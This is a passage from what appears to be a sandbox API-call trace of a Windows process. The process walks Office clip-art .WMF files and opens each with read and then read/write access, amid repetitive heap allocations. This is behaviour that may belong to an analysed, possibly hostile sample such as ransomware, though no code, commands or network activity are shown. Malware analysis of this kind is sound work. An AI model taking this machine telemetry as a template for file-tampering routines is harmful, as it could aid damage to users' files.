(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.912] GetFileType (hFile=0x368) returned 0x1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.912] CloseHandle (hObject=0x368) returned 1 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.913] AreFileApisANSI () returned 1 [0101.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0101.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 69 [0101.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1306)) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0101.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.914] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6906, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00141_.WMF", cAlternateFileName="")) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0101.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.914] AreFileApisANSI () returned 1 [0101.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0101.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.915] AreFileApisANSI () returned 1 [0101.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 69 [0101.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.915] GetFileType (hFile=0x368) returned 0x1 [0101.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.915] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.916] CloseHandle (hObject=0x368) returned 1 [0101.916] AreFileApisANSI () returned 1 [0101.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 69 [0101.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.916] GetFileType (hFile=0x368) returned 0x1 [0101.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.917] CloseHandle (hObject=0x368) returned 1 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.918] AreFileApisANSI () returned 1 [0101.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 69 [0101.918] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6906)) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0101.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.918] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7114, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00146_.WMF", cAlternateFileName="")) returned 1 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.919] AreFileApisANSI () returned 1 [0101.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 